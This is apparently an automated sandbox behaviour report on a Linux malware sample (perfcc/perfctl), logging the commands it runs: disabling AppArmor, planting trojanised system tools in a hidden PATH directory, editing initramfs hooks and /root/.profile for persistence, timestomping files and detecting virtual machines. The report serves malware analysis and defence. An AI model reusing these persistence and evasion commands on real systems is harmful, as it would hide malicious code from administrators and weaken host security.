Source: /usr/bin/xargs (PID: 6461)	Grep executable: /usr/bin/grep -> grep -L "export PATH=.*/\\.local/bin:.PATH" /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptroot
Source: /bin/sh (PID: 6582)	Grep executable: /usr/bin/grep -> grep cron
Source: /bin/sh (PID: 6583)	Grep executable: /usr/bin/grep -> grep /root$
Source: /bin/sh (PID: 6632)	Grep executable: /usr/bin/grep -> grep perfctl
Source: /bin/sh (PID: 6633)	Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 6660)	Grep executable: /usr/bin/grep -> grep cron
Source: /bin/sh (PID: 6661)	Grep executable: /usr/bin/grep -> grep /root$

Source: /bin/sh (PID: 6555)	Pkill executable: /usr/bin/pkill -> pkill -9 perfctl
Source: /usr/bin/xargs (PID: 6699)	Kill executable: /usr/bin/kill -> kill -9 6620
Source: /bin/sh (PID: 6714)	Pkill executable: /usr/bin/pkill -> pkill -9 obfs4proxy

Source: /bin/sh (PID: 6252)	Nohup executable: /usr/bin/nohup -> nohup /tmp/perfcc.elf	Jump to behavior
Source: /bin/sh (PID: 6616)	Nohup executable: /usr/bin/nohup -> nohup perfctl
Source: /bin/sh (PID: 6491)	Nohup executable: /usr/bin/nohup -> nohup /usr/bin/perfcc

Source: /bin/sh (PID: 6631)

Ps executable: /usr/bin/ps -> ps -ax

Source: /bin/sh (PID: 6412)

Rm executable: /usr/bin/rm -> rm -f /tmp/d.xdiag-0 /tmp/lgcdm /tmp/libgcwrap.so

Source: /bin/sh (PID: 6309)	Systemctl executable: /usr/bin/systemctl -> systemctl status auditd
Source: /bin/sh (PID: 6312)	Systemctl executable: /usr/bin/systemctl -> systemctl status apparmor
Source: /bin/sh (PID: 6314)	Systemctl executable: /usr/bin/systemctl -> systemctl stop apparmor
Source: /bin/sh (PID: 6316)	Systemctl executable: /usr/bin/systemctl -> systemctl disable apparmor
Source: /usr/sbin/update-rc.d (PID: 6322)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload
Source: /usr/sbin/update-rc.d (PID: 6328)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload
Source: /bin/sh (PID: 6431)	Systemctl executable: /usr/bin/systemctl -> systemctl --type=service --state=running
Source: /usr/bin/xargs (PID: 6441)	Systemctl executable: /usr/bin/systemctl -> systemctl try-restart ssh.service
Source: /usr/bin/xargs (PID: 6472)	Systemctl executable: /usr/bin/systemctl -> systemctl try-restart systemd-journald.service
Source: /usr/bin/xargs (PID: 6579)	Systemctl executable: /usr/bin/systemctl -> systemctl try-restart unattended-upgrades.service
Source: /bin/sh (PID: 6466)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload
Source: /bin/sh (PID: 6471)	Systemctl executable: /usr/bin/systemctl -> systemctl enable kmodaudit.timer
Source: /bin/sh (PID: 6476)	Systemctl executable: /usr/bin/systemctl -> systemctl start kmodaudit.timer

Source: /bin/sh (PID: 6337)	Touch executable: /usr/bin/touch -> touch -acmr /bin/sh /bin/wizlmsh
Source: /bin/sh (PID: 6362)	Touch executable: /usr/bin/touch -> touch -acmr /bin/sh /bin/perfcc
Source: /bin/sh (PID: 6373)	Touch executable: /usr/bin/touch -> touch -acmr /bin/sh /root/.profile
Source: /bin/sh (PID: 6408)	Touch executable: /usr/bin/touch -> touch -acmr /etc/passwd /bin/.local/bin/crontab /bin/.local/bin/htop /bin/.local/bin/ldd /bin/.local/bin/lsof /bin/.local/bin/strace /bin/.local/bin/top
Source: /bin/sh (PID: 6410)	Touch executable: /usr/bin/touch -> touch /tmp/lgcdm /tmp/d.xdiag-0

Source: /tmp/perfcc.elf (PID: 6239)	Reads from proc file: /proc/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6239)	Reads from proc file: /proc/cpuinfo	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	Reads from proc file: /proc/stat	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	Reads from proc file: /proc/cpuinfo	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads from proc file: /proc/stat	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads from proc file: /proc/cpuinfo	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads from proc file: /proc/sys/net/core/somaxconn	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads from proc file: /proc/meminfo	Jump to behavior
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads from proc file: /proc/cpuinfo
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads from proc file: /proc/meminfo
Source: /usr/bin/ps (PID: 6631)	Reads from proc file: /proc/meminfo
Source: /bin/perfcc (PID: 6478)	Reads from proc file: /proc/stat
Source: /usr/bin/perfcc (PID: 6491)	Reads from proc file: /proc/stat
Source: /usr/bin/perfcc (PID: 6491)	Reads from proc file: /proc/cpuinfo
Source: /tmp/.perf.c/gpg-agent (PID: 6684)	Reads from proc file: /proc/stat
Source: /tmp/.perf.c/gpg-agent (PID: 6684)	Reads from proc file: /proc/cpuinfo
Source: /lib/systemd/systemd-journald (PID: 6485)	Reads from proc file: /proc/meminfo

Source: /usr/bin/chmod (PID: 6267)	File: /tmp/.perf.c/raid5wq (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File: /bin/perfcc (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File: /lib/libgcwrap.so (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File: /tmp/.perf.c/perfctl (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6330)	File: /bin/wizlmsh (bits: u usr: rx grp: rx all: rwx)
Source: /usr/bin/chmod (PID: 6378)	File: /lib/libpprocps.so (bits: - usr: rx grp: rx all: rwx)
Source: /usr/bin/chmod (PID: 6385)	File: /lib/libfsnldev.so (bits: - usr: rx grp: rx all: rwx)
Source: /usr/bin/chmod (PID: 6407)	File: /bin/.local/bin/crontab (bits: - usr: rx grp: rx all: rwx)
Source: /usr/bin/chmod (PID: 6407)	File: /bin/.local/bin/htop (bits: - usr: rx grp: rx all: rwx)
Source: /usr/bin/chmod (PID: 6407)	File: /bin/.local/bin/ldd (bits: - usr: rx grp: rx all: rwx)
Source: /usr/bin/chmod (PID: 6407)	File: /bin/.local/bin/lsof (bits: - usr: rx grp: rx all: rwx)
Source: /usr/bin/chmod (PID: 6407)	File: /bin/.local/bin/strace (bits: - usr: rx grp: rx all: rwx)
Source: /usr/bin/chmod (PID: 6407)	File: /bin/.local/bin/top (bits: - usr: rx grp: rx all: rwx)
Source: /usr/bin/chmod (PID: 6418)	File: /lib/libgcwrap.so (bits: g usr: rx grp: rx all: rwx)
Source: /usr/bin/chmod (PID: 6548)	File: /tmp/.xdiag/data (bits: - usr: rwx grp: rwx all: rwx)
Source: /usr/bin/chmod (PID: 6548)	File: /tmp/.xdiag/data/tty (bits: - usr: rwx grp: rwx all: rwx)
Source: /usr/bin/chmod (PID: 6548)	File: /tmp/.xdiag/data/pam (bits: - usr: rwx grp: rwx all: rwx)
Source: /usr/bin/chmod (PID: 6682)	File: /tmp/.perf.c/gpg-agent (bits: - usr: rx grp: rx all: rwx)

Source: /tmp/.perf.c/raid5wq (PID: 6548)

Chmod executable with 777: /usr/bin/chmod -> chmod -R 777 /tmp/.xdiag/data

Source: /usr/bin/cp (PID: 6265)	File written: /tmp/.perf.c/raid5wq	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File written: /root/.config/cron/perfcc	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File written: /usr/bin/wizlmsh	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File written: /usr/bin/perfcc	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File written: /usr/bin/.local/bin/top	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File written: /usr/bin/.local/bin/htop	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File written: /usr/bin/.local/bin/crontab	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File written: /usr/bin/.local/bin/ldd	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File written: /usr/bin/.local/bin/strace	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File written: /usr/bin/.local/bin/lsof	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File written: /tmp/libgcwrap.so	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File written: /usr/lib/libgcwrap.so	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File written: /tmp/.perf.c/perfctl	Jump to dropped file
Source: /usr/bin/cp (PID: 6375)	File written: /usr/lib/libpprocps.so	Jump to dropped file
Source: /usr/bin/cp (PID: 6380)	File written: /usr/lib/libfsnldev.so	Jump to dropped file
Source: /usr/bin/cp (PID: 6671)	File written: /tmp/.perf.c/gpg-agent	Jump to dropped file

Source: /usr/bin/sed (PID: 6426)	Writes shell script file to disk with an unusual file extension: /usr/share/initramfs-tools/hooks/sedFIsfM5	Jump to dropped file
Source: /usr/bin/sed (PID: 6427)	Writes shell script file to disk with an unusual file extension: /usr/share/initramfs-tools/hooks/sed3s35R9	Jump to dropped file
Source: /usr/bin/sed (PID: 6428)	Writes shell script file to disk with an unusual file extension: /usr/share/initramfs-tools/hooks/sedfK3s9f	Jump to dropped file

Source: /bin/sh (PID: 6433)	Awk executable: /usr/bin/awk -> awk "{print $1}"
Source: /bin/sh (PID: 6634)	Awk executable: /usr/bin/awk -> awk "{print $1}"

Source: /bin/sh (PID: 6372)	Sed executable: /usr/bin/sed -> sed -n -i "/perfcc/d;p;1a test -x /bin/perfcc && FPROF=p /bin/perfcc" /root/.profile
Source: /bin/sh (PID: 6426)	Sed executable: /usr/bin/sed -> sed -i "/^#!\\//a export PATH=/bin/.local/bin:$PATH" /usr/share/initramfs-tools/hooks/btrfs
Source: /bin/sh (PID: 6427)	Sed executable: /usr/bin/sed -> sed -i "/^#!\\//a export PATH=/bin/.local/bin:$PATH" /usr/share/initramfs-tools/hooks/cryptopensc
Source: /bin/sh (PID: 6428)	Sed executable: /usr/bin/sed -> sed -i "/^#!\\//a export PATH=/bin/.local/bin:$PATH" /usr/share/initramfs-tools/hooks/cryptroot

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/.perf.c/raid5wq (PID: 6269)	File: /usr/bin/wizlmsh	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File: /usr/bin/perfcc	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File: /usr/bin/.local/bin/top	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File: /usr/bin/.local/bin/htop	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File: /usr/bin/.local/bin/crontab	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File: /usr/bin/.local/bin/ldd	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File: /usr/bin/.local/bin/strace	Jump to dropped file
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File: /usr/bin/.local/bin/lsof	Jump to dropped file

May use the Tor software to hide its network traffic

Binary or memory string: onion-port

Sample deletes itself

Source: /tmp/.perf.c/raid5wq (PID: 6269)	File: /tmp/.perf.c/perfctl			Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	File: /tmp/.perf.c/perfctl			Jump to behavior

Source: /tmp/.perf.c/raid5wq (PID: 6269)

Path: /usr/bin/.local/bin/lsof

Jump to dropped file

Source: perfcc.elf	Submission file: segment LOAD with 7.7856 entropy (max. 8.0)
Source: raid5wq.29.dr	Dropped file: segment LOAD with 7.7856 entropy (max. 8.0)
Source: perfcc.35.dr	Dropped file: segment LOAD with 7.7856 entropy (max. 8.0)
Source: perfctl.35.dr	Dropped file: segment LOAD with 7.9211 entropy (max. 8.0)
Source: perfcc0.35.dr	Dropped file: segment LOAD with 7.7856 entropy (max. 8.0)
Source: libpprocps.so.114.dr	Dropped file: segment LOAD with 7.7856 entropy (max. 8.0)
Source: libfsnldev.so.120.dr	Dropped file: segment LOAD with 7.7856 entropy (max. 8.0)
Source: gpg-agent.484.dr	Dropped file: segment LOAD with 7.7856 entropy (max. 8.0)

Source: /tmp/perfcc.elf (PID: 6239)	Reads CPU info from proc file: /proc/cpuinfo	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6252)	Reads CPU info from proc file: /proc/cpuinfo	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from proc file: /proc/cpuinfo	Jump to behavior
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from proc file: /proc/cpuinfo
Source: /usr/bin/perfcc (PID: 6491)	Reads CPU info from proc file: /proc/cpuinfo
Source: /tmp/.perf.c/gpg-agent (PID: 6684)	Reads CPU info from proc file: /proc/cpuinfo

Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_id	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_id	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/level	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/type	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/size	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/level	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/type	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/level	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/type	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/size	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/level	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/type	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/size	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/level	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/type	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/shared_cpu_map	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/size	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/level	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/type	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/shared_cpu_map	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/level	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/type	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/shared_cpu_map	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/size	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/level	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/type	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/shared_cpu_map	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/size	Jump to behavior
Source: /usr/bin/pkill (PID: 6555)	Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_cpus
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_id
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/die_cpus
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/package_cpus
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/physical_package_id
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/level
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/type
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/level
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/type
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/level
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/type
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/level
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/type
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_cpus
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_id
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/die_cpus
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/package_cpus
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/physical_package_id
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/shared_cpu_map
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/level
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/type
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/coherency_line_size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/number_of_sets
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/physical_line_partition
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/shared_cpu_map
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/level
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/type
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/shared_cpu_map
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/level
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/type
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/coherency_line_size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/number_of_sets
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/physical_line_partition
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/shared_cpu_map
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/level
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/type
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/coherency_line_size
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/number_of_sets
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/physical_line_partition
Source: /tmp/.perf.c/perfctl (PID: 6616)	Reads CPU info from /sys: /sys/devices/system/cpu/possible
Source: /usr/bin/ps (PID: 6631)	Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/kill (PID: 6699)	Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6714)	Reads CPU info from /sys: /sys/devices/system/cpu/online

Source: /tmp/.perf.c/raid5wq (PID: 6269)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 6386)	Queries kernel information via 'uname':
Source: /bin/bash (PID: 6386)	Queries kernel information via 'uname':
Source: /bin/bash (PID: 6389)	Queries kernel information via 'uname':
Source: /bin/bash (PID: 6389)	Queries kernel information via 'uname':
Source: /bin/bash (PID: 6392)	Queries kernel information via 'uname':
Source: /bin/bash (PID: 6392)	Queries kernel information via 'uname':
Source: /bin/bash (PID: 6395)	Queries kernel information via 'uname':
Source: /bin/bash (PID: 6395)	Queries kernel information via 'uname':
Source: /bin/bash (PID: 6398)	Queries kernel information via 'uname':
Source: /bin/bash (PID: 6398)	Queries kernel information via 'uname':
Source: /bin/bash (PID: 6403)	Queries kernel information via 'uname':
Source: /bin/bash (PID: 6403)	Queries kernel information via 'uname':
Source: /usr/bin/find (PID: 6421)	Queries kernel information via 'uname':
Source: /usr/bin/find (PID: 6437)	Queries kernel information via 'uname':
Source: /usr/bin/find (PID: 6581)	Queries kernel information via 'uname':
Source: /tmp/.perf.c/perfctl (PID: 6616)	Queries kernel information via 'uname':
Source: /tmp/.perf.c/perfctl (PID: 6620)	Queries kernel information via 'uname':
Source: /usr/bin/find (PID: 6659)	Queries kernel information via 'uname':
Source: /lib/systemd/systemd-journald (PID: 6485)	Queries kernel information via 'uname':

Source: perfctl, 6620.1.00007fe720464000.00007fe720483000.rw-.sdmp	Binary or memory string: VMware Virtual Platform
Source: perfctl, 6620.1.00007fe720464000.00007fe720483000.rw-.sdmp	Binary or memory string: VMware, Inc.
Source: perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	Binary or memory string: vmtoolsdsleep721
Source: perfcc.elf, 6239.1.000000c000000000.000000c000400000.rw-.sdmp	Binary or memory string: vsock 36864 2 vmw_vsock_vmci_transport, Live 0xffffffffc050d000
Source: perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	Binary or memory string: 003f15ad074010 1081 febfe004 0 0 0 0 0 40 2000 0 0 0 0 0vmw_vmci
Source: perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	Binary or memory string: Co/usr/bin/vmtoolsdsystemd-network
Source: lgctr.188.dr	Binary or memory string: drwx------ 2 root root 4096 Aug 25 2021 vmware-root_721-4290559889
Source: perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	Binary or memory string: 720VGAuthService/proc/720/statusM%sleep72072072117285576201728557620_720/proc/721/comm/proc/721/commvmtoolsd
Source: perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	Binary or memory string: virtiovmwarevwl"miwaitidzombie\|=<;=< %v=%v, (conn) (scan (scan) (trap Flags= MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil
Source: perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	Binary or memory string: nvmtoolsdsleep72117285576207217591728557620_721/proc/759/comm/proc/759/commsystemd-network
